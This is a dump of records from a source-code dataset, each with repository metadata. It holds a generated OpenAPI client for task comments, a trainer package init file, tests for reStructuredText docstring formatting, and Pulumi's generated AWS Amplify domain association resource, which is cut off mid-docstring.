                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate and return only the response body.
        kwargs['_return_http_data_only'] = True
        return self.get_comment_with_http_info(id, comment_id, **kwargs)  # noqa: E501

    def get_comment_with_http_info(self, id, comment_id, **kwargs):  # noqa: E501
        """get_comment  # noqa: E501

        Retrieves a task comment by task id and comment id.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_comment_with_http_info(id, comment_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: The id of the task. (required)
        :param str comment_id: The id of the comment to be retrieved. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(CommentDto, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = [
            'id',
            'comment_id'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_comment" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `get_comment`")  # noqa: E501
        # verify the required parameter 'comment_id' is set
        if self.api_client.client_side_validation and ('comment_id' not in local_var_params or  # noqa: E501
                                                       local_var_params['comment_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `comment_id` when calling `get_comment`")  # noqa: E501

        collection_formats = {}

        # Note the snake_case -> camelCase mapping for the URL placeholder.
        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501
        if 'comment_id' in local_var_params:
            path_params['commentId'] = local_var_params['comment_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/task/{id}/comment/{commentId}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='CommentDto',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_comments(self, id, **kwargs):  # noqa: E501
        """get_comments  # noqa: E501

        Gets the comments for a task by id.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_comments(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: The id of the task to retrieve the comments for. (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: list[CommentDto]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper: delegate and return only the response body.
        kwargs['_return_http_data_only'] = True
        return self.get_comments_with_http_info(id, **kwargs)  # noqa: E501

    def get_comments_with_http_info(self, id, **kwargs):  # noqa: E501
        """get_comments  # noqa: E501

        Gets the comments for a task by id.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_comments_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: The id of the task to retrieve the comments for. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(list[CommentDto], status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = [
            'id'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_comments" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `get_comments`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/task/{id}/comment', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[CommentDto]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
| 42.741206
| 152
| 0.584328
| 1,935
| 17,011
| 4.909561
| 0.098708
| 0.043789
| 0.061895
| 0.028421
| 0.916947
| 0.906316
| 0.898947
| 0.892737
| 0.879263
| 0.879263
| 0
| 0.015618
| 0.341309
| 17,011
| 397
| 153
| 42.848867
| 0.832218
| 0.461231
| 0
| 0.688172
| 1
| 0
| 0.156737
| 0.031273
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037634
| false
| 0
| 0.026882
| 0
| 0.102151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56a60f46f53ff3d5f94c29ae341ddd25dff9107d
| 394
|
py
|
Python
|
hypothesis/auto/training/__init__.py
|
JoeriHermans/hypothesis
|
29a2b7b4649db345d43a8d3bf98aa5d817b43f1b
|
[
"BSD-3-Clause"
] | 45
|
2019-02-13T14:16:35.000Z
|
2022-02-23T21:30:02.000Z
|
hypothesis/auto/training/__init__.py
|
JoeriHermans/hypothesis
|
29a2b7b4649db345d43a8d3bf98aa5d817b43f1b
|
[
"BSD-3-Clause"
] | 1
|
2020-01-13T08:29:50.000Z
|
2020-01-22T10:28:02.000Z
|
hypothesis/auto/training/__init__.py
|
JoeriHermans/hypothesis
|
29a2b7b4649db345d43a8d3bf98aa5d817b43f1b
|
[
"BSD-3-Clause"
] | 8
|
2019-04-23T14:25:08.000Z
|
2021-07-28T15:05:31.000Z
|
from .base import BaseTrainer
from .amortized_ratio_estimation import BaseAmortizedRatioEstimatorTrainer
from .amortized_ratio_estimation import LikelihoodToEvidenceRatioEstimatorTrainer
from .amortized_ratio_estimation import LikelihoodToEvidenceCriterion
from .amortized_ratio_estimation import ConservativeLikelihoodToEvidenceCriterion
from .amortized_ratio_estimation import create_trainer
| 56.285714
| 81
| 0.923858
| 35
| 394
| 10.085714
| 0.371429
| 0.184136
| 0.254958
| 0.396601
| 0.481586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060914
| 394
| 6
| 82
| 65.666667
| 0.954054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3b6ca5ed0859acf5d352241bcfea4c7294f1f40d
| 6,493
|
py
|
Python
|
tests/rst/test_style.py
|
LudditeLabs/autodoc-tool
|
b4ae7e3b61907e7e9c3a1b534fce055e5860ffab
|
[
"Apache-2.0"
] | null | null | null |
tests/rst/test_style.py
|
LudditeLabs/autodoc-tool
|
b4ae7e3b61907e7e9c3a1b534fce055e5860ffab
|
[
"Apache-2.0"
] | null | null | null |
tests/rst/test_style.py
|
LudditeLabs/autodoc-tool
|
b4ae7e3b61907e7e9c3a1b534fce055e5860ffab
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Luddite Labs Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from autodoc.contentdb import Arg
# Module-level settings — presumably consumed by the assert_py_doc fixture
# to select the docstring style under test; confirm against conftest.
docstring_style = 'rst'
docstring_keep_transforms = True
# TODO: add more tests.
# Test: convert python docstring to plain reStructuredText.
class TestStyleRst:
    """Round-trip tests for reStructuredText docstring normalisation.

    Each test feeds `assert_py_doc` an input docstring (`text`) and the
    normalised output the tool is expected to produce (`expected`).
    """

    # Test: complex docstring.
    def test_complex(self, assert_py_doc):
        """Fields are reordered/normalised: params follow the declared arg
        order, `:parameter:`/`:return x:` oddities are cleaned up, and
        `:Yields:` is re-wrapped ahead of the directives."""
        args = (Arg('sender', ['str']),
                Arg('recipient', ['str']),
                Arg('message_body', ['str']),
                Arg('priority', ['integer', 'float']))
        assert_py_doc(
            args=args,
            text="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
:parameter:
:param str sender: The person sending the message
:param str message_body: The body of the message
:param str recipient: NOTE! THIS PARAM MUST BE PLACED AFTER sender!
:parameter priority: The priority of the message,
can be a number 1-5
:type priority: integer or float
:return bla bla: Hz
:return: the message id
:rtype: int
:return: the message id2
:rtype: char
:rtype: string
:raises ValueError: if the message_body exceeds 160 characters
:raises TypeError: if the message_body is not a basestring
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
:Yields: eos qui ratione voluptatem sequi nesciunt.
Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet
""",
            expected="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
:param str sender: The person sending the message
:param str recipient: NOTE! THIS PARAM MUST BE PLACED AFTER sender!
:param str message_body: The body of the message
:param priority: The priority of the message, can be a number 1-5
:type priority: integer or float
:returns: the message id
:rtype: int
:returns: the message id2
:rtype: char
:rtype: string
:raises ValueError: if the message_body exceeds 160 characters
:raises TypeError: if the message_body is not a basestring
:Yields: eos qui ratione voluptatem sequi nesciunt. Neque porro
quisquam est, qui dolorem ipsum quia dolor sit amet
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
"""
        )

    # Test: add missing params.
    def test_missing_params(self, assert_py_doc):
        """Params declared in `args` but absent from the docstring are
        appended as empty `:param:` fields."""
        args = (Arg('sender', ['str']),
                Arg('recipient', ['str']),
                Arg('message_body', ['str']))
        assert_py_doc(
            args=args,
            text="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
""",
            expected="""
This is an ordinary paragraph.
>>> print 'this is a Doctest block'
this is a Doctest block
The following is a literal block::
>>> This is not recognized as a doctest block by
reStructuredText. It *will* be recognized by the doctest
module, though!
.. versionadded:: 0.10
Bottom line.
.. seealso:: Another function.
.. note:: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
:param str sender:
:param str recipient:
:param str message_body:
"""
        )

    # Test: keyword field.
    def test_keyword(self, assert_py_doc):
        """`:keyword:` text is re-wrapped and `:kwtype:` is folded into the
        keyword field (`:keyword int one:`) when it names a single type."""
        assert_py_doc(
            text="""
This is an ordinary paragraph.
:keyword name: Same as examples section.
Quis autem vel eum iure reprehenderit qui
Examples should be written in doctest format,
illustrate how to use the function.
:kwtype name: str, sds
:keyword one: Examples should be written in doctest format
:kwtype one: int
Bottom line.
""",
            expected="""
This is an ordinary paragraph.
:keyword name: Same as examples section. Quis autem vel eum iure
reprehenderit qui Examples should be written in doctest format,
illustrate how to use the function.
:kwtype name: str, sds
:keyword int one: Examples should be written in doctest format
Bottom line.
"""
        )
| 34.173684
| 79
| 0.556907
| 730
| 6,493
| 4.915068
| 0.269863
| 0.0301
| 0.043478
| 0.031215
| 0.751115
| 0.739967
| 0.736622
| 0.736622
| 0.713768
| 0.713768
| 0
| 0.007899
| 0.376097
| 6,493
| 189
| 80
| 34.354497
| 0.877808
| 0.107962
| 0
| 0.710938
| 0
| 0
| 0.859518
| 0
| 0
| 0
| 0
| 0.005291
| 0.046875
| 1
| 0.023438
| false
| 0
| 0.007813
| 0
| 0.039063
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b83e4eb7d53ed38f184b0024c772b753de49ee4
| 18,870
|
py
|
Python
|
sdk/python/pulumi_aws/amplify/domain_association.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/amplify/domain_association.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/amplify/domain_association.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DomainAssociationArgs', 'DomainAssociation']
@pulumi.input_type
class DomainAssociationArgs:
    # Auto-generated by the Pulumi Terraform Bridge; each constructor argument
    # is mirrored by a property pair backed by pulumi.get/pulumi.set.
    def __init__(__self__, *,
                 app_id: pulumi.Input[str],
                 domain_name: pulumi.Input[str],
                 sub_domains: pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]],
                 wait_for_verification: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a DomainAssociation resource.
        :param pulumi.Input[str] app_id: The unique ID for an Amplify app.
        :param pulumi.Input[str] domain_name: The domain name for the domain association.
        :param pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]] sub_domains: The setting for the subdomain. Documented below.
        :param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        pulumi.set(__self__, "app_id", app_id)
        pulumi.set(__self__, "domain_name", domain_name)
        pulumi.set(__self__, "sub_domains", sub_domains)
        # Optional argument: only stored when explicitly provided.
        if wait_for_verification is not None:
            pulumi.set(__self__, "wait_for_verification", wait_for_verification)

    @property
    @pulumi.getter(name="appId")
    def app_id(self) -> pulumi.Input[str]:
        """
        The unique ID for an Amplify app.
        """
        return pulumi.get(self, "app_id")

    @app_id.setter
    def app_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "app_id", value)

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """
        The domain name for the domain association.
        """
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter(name="subDomains")
    def sub_domains(self) -> pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]:
        """
        The setting for the subdomain. Documented below.
        """
        return pulumi.get(self, "sub_domains")

    @sub_domains.setter
    def sub_domains(self, value: pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]):
        pulumi.set(self, "sub_domains", value)

    @property
    @pulumi.getter(name="waitForVerification")
    def wait_for_verification(self) -> Optional[pulumi.Input[bool]]:
        """
        If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        return pulumi.get(self, "wait_for_verification")

    @wait_for_verification.setter
    def wait_for_verification(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "wait_for_verification", value)
@pulumi.input_type
class _DomainAssociationState:
    # Auto-generated state class: unlike the Args class, every field is
    # optional, and it additionally exposes the provider-computed outputs
    # (`arn`, `certificate_verification_dns_record`).
    def __init__(__self__, *,
                 app_id: Optional[pulumi.Input[str]] = None,
                 arn: Optional[pulumi.Input[str]] = None,
                 certificate_verification_dns_record: Optional[pulumi.Input[str]] = None,
                 domain_name: Optional[pulumi.Input[str]] = None,
                 sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]] = None,
                 wait_for_verification: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering DomainAssociation resources.
        :param pulumi.Input[str] app_id: The unique ID for an Amplify app.
        :param pulumi.Input[str] arn: The Amazon Resource Name (ARN) for the domain association.
        :param pulumi.Input[str] certificate_verification_dns_record: The DNS record for certificate verification.
        :param pulumi.Input[str] domain_name: The domain name for the domain association.
        :param pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]] sub_domains: The setting for the subdomain. Documented below.
        :param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        # Only explicitly-provided fields are stored.
        if app_id is not None:
            pulumi.set(__self__, "app_id", app_id)
        if arn is not None:
            pulumi.set(__self__, "arn", arn)
        if certificate_verification_dns_record is not None:
            pulumi.set(__self__, "certificate_verification_dns_record", certificate_verification_dns_record)
        if domain_name is not None:
            pulumi.set(__self__, "domain_name", domain_name)
        if sub_domains is not None:
            pulumi.set(__self__, "sub_domains", sub_domains)
        if wait_for_verification is not None:
            pulumi.set(__self__, "wait_for_verification", wait_for_verification)

    @property
    @pulumi.getter(name="appId")
    def app_id(self) -> Optional[pulumi.Input[str]]:
        """
        The unique ID for an Amplify app.
        """
        return pulumi.get(self, "app_id")

    @app_id.setter
    def app_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "app_id", value)

    @property
    @pulumi.getter
    def arn(self) -> Optional[pulumi.Input[str]]:
        """
        The Amazon Resource Name (ARN) for the domain association.
        """
        return pulumi.get(self, "arn")

    @arn.setter
    def arn(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "arn", value)

    @property
    @pulumi.getter(name="certificateVerificationDnsRecord")
    def certificate_verification_dns_record(self) -> Optional[pulumi.Input[str]]:
        """
        The DNS record for certificate verification.
        """
        return pulumi.get(self, "certificate_verification_dns_record")

    @certificate_verification_dns_record.setter
    def certificate_verification_dns_record(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate_verification_dns_record", value)

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> Optional[pulumi.Input[str]]:
        """
        The domain name for the domain association.
        """
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter(name="subDomains")
    def sub_domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]]:
        """
        The setting for the subdomain. Documented below.
        """
        return pulumi.get(self, "sub_domains")

    @sub_domains.setter
    def sub_domains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainAssociationSubDomainArgs']]]]):
        pulumi.set(self, "sub_domains", value)

    @property
    @pulumi.getter(name="waitForVerification")
    def wait_for_verification(self) -> Optional[pulumi.Input[bool]]:
        """
        If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        return pulumi.get(self, "wait_for_verification")

    @wait_for_verification.setter
    def wait_for_verification(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "wait_for_verification", value)
class DomainAssociation(pulumi.CustomResource):
    """
    An AWS Amplify Domain Association resource
    (``aws:amplify/domainAssociation:DomainAssociation``).

    NOTE: this class is generated by the Pulumi Terraform Bridge (tfgen);
    the two ``__init__`` overloads exist only for type checkers — the real
    constructor dispatches to ``_internal_init``.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 app_id: Optional[pulumi.Input[str]] = None,
                 domain_name: Optional[pulumi.Input[str]] = None,
                 sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]]] = None,
                 wait_for_verification: Optional[pulumi.Input[bool]] = None,
                 __props__=None):
        """
        Provides an Amplify Domain Association resource.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_aws as aws

        example_app = aws.amplify.App("exampleApp", custom_rules=[aws.amplify.AppCustomRuleArgs(
            source="https://example.com",
            status="302",
            target="https://www.example.com",
        )])
        master = aws.amplify.Branch("master",
            app_id=example_app.id,
            branch_name="master")
        example_domain_association = aws.amplify.DomainAssociation("exampleDomainAssociation",
            app_id=example_app.id,
            domain_name="example.com",
            sub_domains=[
                aws.amplify.DomainAssociationSubDomainArgs(
                    branch_name=master.branch_name,
                    prefix="",
                ),
                aws.amplify.DomainAssociationSubDomainArgs(
                    branch_name=master.branch_name,
                    prefix="www",
                ),
            ])
        ```

        ## Import

        Amplify domain association can be imported using `app_id` and `domain_name`, e.g.,

        ```sh
         $ pulumi import aws:amplify/domainAssociation:DomainAssociation app d2ypk4k47z8u6/example.com
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] app_id: The unique ID for an Amplify app.
        :param pulumi.Input[str] domain_name: The domain name for the domain association.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]] sub_domains: The setting for the subdomain. Documented below.
        :param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: DomainAssociationArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides an Amplify Domain Association resource.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_aws as aws

        example_app = aws.amplify.App("exampleApp", custom_rules=[aws.amplify.AppCustomRuleArgs(
            source="https://example.com",
            status="302",
            target="https://www.example.com",
        )])
        master = aws.amplify.Branch("master",
            app_id=example_app.id,
            branch_name="master")
        example_domain_association = aws.amplify.DomainAssociation("exampleDomainAssociation",
            app_id=example_app.id,
            domain_name="example.com",
            sub_domains=[
                aws.amplify.DomainAssociationSubDomainArgs(
                    branch_name=master.branch_name,
                    prefix="",
                ),
                aws.amplify.DomainAssociationSubDomainArgs(
                    branch_name=master.branch_name,
                    prefix="www",
                ),
            ])
        ```

        ## Import

        Amplify domain association can be imported using `app_id` and `domain_name`, e.g.,

        ```sh
         $ pulumi import aws:amplify/domainAssociation:DomainAssociation app d2ypk4k47z8u6/example.com
        ```

        :param str resource_name: The name of the resource.
        :param DomainAssociationArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two typing overloads above: callers pass
        # either a single DomainAssociationArgs object or individual kwargs.
        resource_args, opts = _utilities.get_resource_args_opts(DomainAssociationArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       app_id: Optional[pulumi.Input[str]] = None,
                       domain_name: Optional[pulumi.Input[str]] = None,
                       sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]]] = None,
                       wait_for_verification: Optional[pulumi.Input[bool]] = None,
                       __props__=None):
        # Actual constructor body shared by both overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id is only set when rehydrating an existing resource via get();
        # in that flow __props__ carries the state and no inputs are required.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = DomainAssociationArgs.__new__(DomainAssociationArgs)
            # Required inputs are only enforced for fresh resources (no urn).
            if app_id is None and not opts.urn:
                raise TypeError("Missing required property 'app_id'")
            __props__.__dict__["app_id"] = app_id
            if domain_name is None and not opts.urn:
                raise TypeError("Missing required property 'domain_name'")
            __props__.__dict__["domain_name"] = domain_name
            if sub_domains is None and not opts.urn:
                raise TypeError("Missing required property 'sub_domains'")
            __props__.__dict__["sub_domains"] = sub_domains
            __props__.__dict__["wait_for_verification"] = wait_for_verification
            # Output-only properties start as None; the engine fills them in.
            __props__.__dict__["arn"] = None
            __props__.__dict__["certificate_verification_dns_record"] = None
        super(DomainAssociation, __self__).__init__(
            'aws:amplify/domainAssociation:DomainAssociation',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            app_id: Optional[pulumi.Input[str]] = None,
            arn: Optional[pulumi.Input[str]] = None,
            certificate_verification_dns_record: Optional[pulumi.Input[str]] = None,
            domain_name: Optional[pulumi.Input[str]] = None,
            sub_domains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]]] = None,
            wait_for_verification: Optional[pulumi.Input[bool]] = None) -> 'DomainAssociation':
        """
        Get an existing DomainAssociation resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] app_id: The unique ID for an Amplify app.
        :param pulumi.Input[str] arn: The Amazon Resource Name (ARN) for the domain association.
        :param pulumi.Input[str] certificate_verification_dns_record: The DNS record for certificate verification.
        :param pulumi.Input[str] domain_name: The domain name for the domain association.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainAssociationSubDomainArgs']]]] sub_domains: The setting for the subdomain. Documented below.
        :param pulumi.Input[bool] wait_for_verification: If enabled, the resource will wait for the domain association status to change to `PENDING_DEPLOYMENT` or `AVAILABLE`. Setting this to `false` will skip the process. Default: `true`.
        """
        # Setting opts.id makes _internal_init take the "existing resource" path.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _DomainAssociationState.__new__(_DomainAssociationState)
        __props__.__dict__["app_id"] = app_id
        __props__.__dict__["arn"] = arn
        __props__.__dict__["certificate_verification_dns_record"] = certificate_verification_dns_record
        __props__.__dict__["domain_name"] = domain_name
        __props__.__dict__["sub_domains"] = sub_domains
        __props__.__dict__["wait_for_verification"] = wait_for_verification
        return DomainAssociation(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="appId")
    def app_id(self) -> pulumi.Output[str]:
        """
        The unique ID for an Amplify app.
        """
        return pulumi.get(self, "app_id")

    @property
    @pulumi.getter
    def arn(self) -> pulumi.Output[str]:
        """
